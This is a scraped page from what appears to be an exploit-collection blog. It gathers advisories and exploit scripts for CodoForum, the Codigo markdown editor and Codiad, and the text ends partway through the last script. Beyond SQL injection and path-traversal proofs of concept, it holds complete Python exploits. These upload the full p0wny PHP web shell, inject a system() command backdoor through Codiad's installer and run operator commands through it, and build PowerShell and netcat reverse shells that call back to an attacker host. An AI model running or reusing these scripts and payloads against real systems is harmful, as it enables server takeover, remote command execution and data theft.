CodoForum 3.3.1: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team
http://blog.curesec.com/article/blog/CodoForum-331-Multiple-SQL-Injection-Vulnerabilities-42.html
1. Introduction
Affected Product: CodoForum 3.3.1
Fixed in: 3.4
Fixed Version Link:
https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.3.4.build-19.zip
Vendor Contact: admin@codologic.com
Vulnerability Type: Multiple SQL injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
There are two SQL injections in the CodoForum application. One is a
blind injection which does not require any credentials, the other is a
normal SQL injection which does require that the attacker be authenticated.
These vulnerabilities can lead to data leaks as well as compromisation
of the host.
SQL Injection 1 (Blind)
The script that parses the request URL and displays posts depending on
the retrieved id does not use proper protection against SQL injections.
It does cast the retrieved user input to int, but it does not use this
value, but the original value instead.
The retrieved values are never displayed to the end user, making this a
blind injection. An attacker does not need to be authenticated to
perform this attack.
Proof of Concept:
http://localhost/codoforum/index.php?u=/page/6 and
1=1%23/terms-of-service
-> true (terms and services displayed)
http://localhost/codoforum/index.php?u=/page/6 and
1=2%23/terms-of-service
-> false ("You do not have enough permissions to view this page!")
Code:
routes.php:593
$pid = (int) $id;
$user = \CODOF\User\User::get();
$qry = 'SELECT title, content FROM ' . PREFIX . 'codo_pages p '
. ' LEFT JOIN ' . PREFIX . 'codo_page_roles r ON
r.pid=p.id '
. ' WHERE (r.rid IS NULL OR (r.rid IS NOT NULL AND
r.rid IN (' . implode($user->rids) . ')))'
. ' AND p.id=' . $id;
SQL Injection 2
The script processing the mass sending of email does not properly handle
the subject, body, or roles arguments it retrieves from a POST request.
The script can only be accessed by authenticated users.
The following request:
http://localhost/codoforum/admin/index.php?page=system/massmail
POST: subject=USER_SUPPLIED_subj&body=USER_SUPPLIED_body
for example results in this query:
INSERT INTO codo_mail_queue (to_address, mail_subject, body) SELECT
mail, 'USER_SUPPLIED_subj', 'USER_SUPPLIED_body' FROM codo_users AS u
Code:
admin/modules/system/massmail.php
$subject = html_entity_decode($_POST['subject'],
ENT_NOQUOTES, "UTF-8");
$body = html_entity_decode($_POST['body'], ENT_NOQUOTES,
"UTF-8");
[...]
if (isset($_POST['roles'])) {
$condition = " INNER JOIN " . PREFIX .
"codo_user_roles AS r ON r.uid=u.id "
. " WHERE r.rid IN (" .
implode($_POST['roles']) . ")";
}
$qry = "INSERT INTO " . PREFIX . "codo_mail_queue
(to_address, mail_subject, body)"
. " SELECT mail, '$subject', '$body' FROM " .
PREFIX . "codo_users AS u"
. $condition;
3. Solution
Upgrade to Version 3.4:
https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.3.4.build-19.zip
4. Report Timeline
07/07/2015 Informed Vendor about Issue
07/07/2015 Vendor confirmation
08/03/2015 Vendor releases Version 3.4
08/07/2015 Disclosed to public
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141683
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
1. Advisory Information
========================================
Title : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage : https://codoforum.com/
Remotely Exploitable : Yes
Versions Affected : Prior to 3.2.1
Tested on : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability : SQL Injection (Critical/High)
Date : 23.07.2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman
3. Description
========================================
The script that parses the request URL and displays user profile depending on
the retrieved id does not use proper input validation against SQL injection.
4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching current user database:
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))
5. SOLUTION
========================================
Upgrade to the latest version v3.4 build 19
# Exploit Title: Codoforum 2.5.1 Arbitrary File Download
# Date: 23-11-2014
# Software Link: https://codoforum.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9261
1. Description
str_replace() is used to sanitize file path but function output is not assigned to variable
private function sanitize($name) {
str_replace("..", "", $name);
str_replace("%2e%2e", "", $name);
return $name;
}
http://security.szurek.pl/codoforum-251-arbitrary-file-download.html
2. Proof of Concept
http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php
or
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php
3. Solution:
Use patch:
https://codoforum.com/upgrades/codoforum.v.2.6.up.zip
# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage: https://alfonzm.github.io/codigo/
# Software Link: https://github.com/alfonzm/codigo-app
# Version: 1.0.1
# Tested on: [Mac OS 13]
Release Date:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2023-05-03
Product & Service Introduction:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D
A Markdown editor & notes app made with Vue & Electron
Technical Details & Description:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
user to execute arbitrary code by opening a specially crafted file.
Proof of Concept (PoC):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following pay=
load:
<video><source onerror=3D"alert(require('child_process').execSync('/System/=
Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
Opening the file in Codigo will auto execute the Calculator application.
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
# Author: P4p4_M4n3
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Type: WebApp
###################-------------------------##########################------------###################
# Proof of Concept: #
# #
# 1- login on codiad #
# #
# 2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory #
# #
# 3- right click and select upload file #
# #
# 4- click on "Drag file or Click Here To Upload" and select your reverse_shell file #
# #
###################-------------------------#########################-------------###################
after that your file should be in INF directory, right click on your file and select delete,
and you will see the full path of your file
run it in your terminal with "curl" and boom!!
/var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php
1 - # nc -lnvp 1234
2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)
# Date: 24.05.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://codiad.com/
# Software Link: https://github.com/Codiad/Codiad/releases/tag/v.2.8.4
# Version: 2.8.4
# Tested on Xubuntu 20.04
# CVE: CVE-2018-19423
'''
Description:
Codiad 2.8.4 allows remote authenticated administrators to execute arbitrary code by uploading an executable file.
'''
'''
Import required modules:
'''
import requests
import json
import time
import sys
import urllib.parse
'''
User Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
codiadpath = input('Please input the path of Codiad( for example: / ): ')
projectname = input('Please input the name of the actual project: ')
'''
Get cookie
'''
session = requests.Session()
link = 'http://' + target_ip + ':' + target_port + codiadpath
response = session.get(link)
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
'''
Authentication:
'''
# Compute Content-Length:
base_content_len = 45
username_encoded = urllib.parse.quote(username, safe='')
username_encoded_len = len(username_encoded.encode('utf-8'))
password_encoded = urllib.parse.quote(password, safe='')
password_encoded_len = len(password_encoded.encode('utf-8'))
content_len = base_content_len + username_encoded_len + password_encoded_len
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': '*/*',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': str(content_len),
'Origin': 'http://' + target_ip + ':' + target_port,
'Connection': 'close',
'Referer': 'http://' + target_ip + ':' + target_port + '/',
'Cookie': cookie
}
# Body:
body = {
'username': username,
'password': password,
'theme': 'default',
'language': 'en'
}
# Post authentication request:
link_base = 'http://' + target_ip + ':' + target_port + codiadpath
link_auth = link_base + 'components/user/controller.php?action=authenticate'
print('')
print('Posting authentication request: ')
auth = requests.post(link_auth, headers=header, data=body)
print('Response: ')
print(auth.text)
time.sleep(2)
'''
Upload Webshell:
'''
# Construct Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
"Content-Type": "multipart/form-data; boundary=---------------------------289777152427948045812862014674",
'Connection': 'close',
'Cookie': cookie,
'Upgrade-Insecure-Requests': '1'
}
# Construct Shell Payload: https://github.com/flozz/p0wny-shell
data = "\r\n\r\n\r\n-----------------------------289777152427948045812862014674\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xc3\xa2\xc2\x80\xc2\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------289777152427948045812862014674--\r\n"
#Construct link and posting request which will upload the file:
link_exploit = link_base + 'components/filemanager/controller.php?action=upload&path=/var/www/html/data/' + projectname
print('')
print('Posting request wich will upload the file: ')
exploit = requests.post(link_exploit, headers=header, data=data)
print('Response:')
print(exploit.text)
time.sleep(2)
'''
Finish:
'''
print('')
print('File uploaded except you got an error message before. If so please run this program again and correct your',
'mistakes!')
print('')
print('Path of file on the server: http://' + target_ip + ':' + target_port + codiadpath + '/data/' + projectname + '/' + 'shell.php')
print('')
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)
# Date: 21.05.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Credits to: https://herolab.usd.de/security-advisories/usd-2019-0049/ (Tobias Neitzel)
# Vendor Homepage: http://codiad.com/
# Software Link: https://github.com/Codiad/Codiad/releases/tag/v.2.8.4
# Version: 2.8.4
# Tested on: Xubuntu 20.04 and Cent OS 8.3
# CVE: CVE-2019-19208
'''
Description:
An unauthenticated attacker can inject PHP code before the initial configuration
that gets executed and therefore he can run arbitrary system commands on the server.
'''
'''
Import required modules:
'''
import requests
import json
import sys
import time
'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
'''
Determining target:
--> The installationpaths to select from are derived from the installation instructions from:
https://github.com/Codiad/Codiad/wiki/Installation
'''
print('Enter one of the following numbers to proceed')
print('[1]: OS of the target: Higher than Ubuntu 13.04; path: /var/www/html/')
print('[2]: OS of the target: Ubuntu 13.04 or below; path: /var/www/')
print('[3]: OS of the target: CENT OS; path: /var/www/html/')
selection = int(input('Your Choice: '))
if selection == 3 or selection == 1:
path = "/var/www/html"
content_len = "191"
if selection == 2:
path = '/var/www'
content_len = '185'
'''
Get cookie
'''
session = requests.Session()
link = 'http://' + target_ip + ':' + target_port + '/'
response = session.get(link)
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
'''
Construct header:
'''
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.',
'Accept': '*/*',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': content_len,
'Origin': 'htttp://' + target_ip,
'Connection': 'close',
'Referer': 'http://' + target_ip + '/',
'Cookie': cookie,
}
'''
Construct body:
'''
string = """'"); system($_GET["cmd"]); print("'"""
body = {
'path': path,
'username': 'test',
'password': 'exploit',
'password_confirm': 'exploit',
'project_name': 'hello',
'project_path': path + '/data',
'timezone': str(string)
}
'''
Post the request with the malaicious payload
'''
print('Posting request with malicious payload')
link = link + '/components/install/process.php'
x = requests.post(link, headers=header, data=body)
print('Waiting 10 seconds')
time.sleep(10)
'''
Create payload / persistend command execution:
'''
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie': cookie,
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'mag-age=0'
}
payload = input('Input the command, which should be executed on the targeted machine. To abort enter EXIT: ')
while payload != 'EXIT':
link_payload = 'http://' + target_ip + ':' + target_port + '/config.php?cmd=' + payload
x = requests.get(link_payload, headers=header)
print(x.text)
payload = input('Input the command, which should be executed on the targeted machine. To abort enter EXIT: ')
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated)
# Discovery by: WangYihang
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Tested Version: Version: 2.8.4
# CVE: CVE-2018-14009
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import json
import base64
session = requests.Session()
def login(domain, username, password):
global session
url = domain + "/components/user/controller.php?action=authenticate"
data = {
"username": username,
"password": password,
"theme": "default",
"language": "en"
}
response = session.post(url, data=data, verify=False)
content = response.text
print("[+] Login Content : %s" % (content))
if 'status":"success"' in content:
return True
def get_write_able_path(domain):
global session
url = domain + "/components/project/controller.php?action=get_current"
response = session.get(url, verify=False)
content = response.text
print("[+] Path Content : %s" % (content))
json_obj = json.loads(content)
if json_obj['status'] == "success":
return json_obj['data']['path']
else:
return False
def base64_encode_2_bytes(host, port):
payload = '''
$client = New-Object System.Net.Sockets.TCPClient("__HOST__",__PORT__);
$stream = $client.GetStream();
[byte[]]$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();
'''
result = ""
for i in payload.replace("__HOST__", host).replace("__PORT__", str(port)):
result += i + "\x00"
return base64.b64encode(result.encode()).decode().replace("\n", "")
def build_powershell_payload(host, port):
preffix = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc "
return preffix + base64_encode_2_bytes(host, port).replace("+", "%2b")
def exploit(domain, username, password, host, port, path, platform):
global session
url = domain + \
"components/filemanager/controller.php?type=1&action=search&path=%s" % (
path)
if platform.lower().startswith("win"):
# new version escapeshellarg
# escapeshellarg on windows will quote the arg with ""
# so we need to try twice
payload = '||%s||' % (build_powershell_payload(host, port))
payload = "search_string=Hacker&search_file_type=" + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(url, data=payload, headers=headers, verify=False)
content = response.text
print(content)
# old version escapeshellarg
payload = '%%22||%s||' % (build_powershell_payload(host, port))
payload = "search_string=Hacker&search_file_type=" + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(url, data=payload, headers=headers, verify=False)
content = response.text
print(content)
else:
# payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ'''
payload = '"%%0Anc %s %d|/bin/bash %%23' % (host, port)
payload = "search_string=Hacker&search_file_type=" + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(url, data=payload, headers=headers, verify=False)
content = response.text
print(content)
def promote_yes(hint):
print(hint)
while True:
ans = input("[Y/n] ").lower()
if ans == 'n':
return False
elif ans == 'y':
return True
else:
print("Incorrect input")
def main():
if len(sys.argv) != 7:
print("Usage : ")
print(" python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0]))
print(" python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0]))
print("Example : ")
print(" python %s http://localhost/ admin admin 8.8.8.8 8888 linux" % (sys.argv[0]))
print(" python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows" % (sys.argv[0]))
print("Author : ")
print(" WangYihang <wangyihanger@gmail.com>")
exit(1)
domain = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
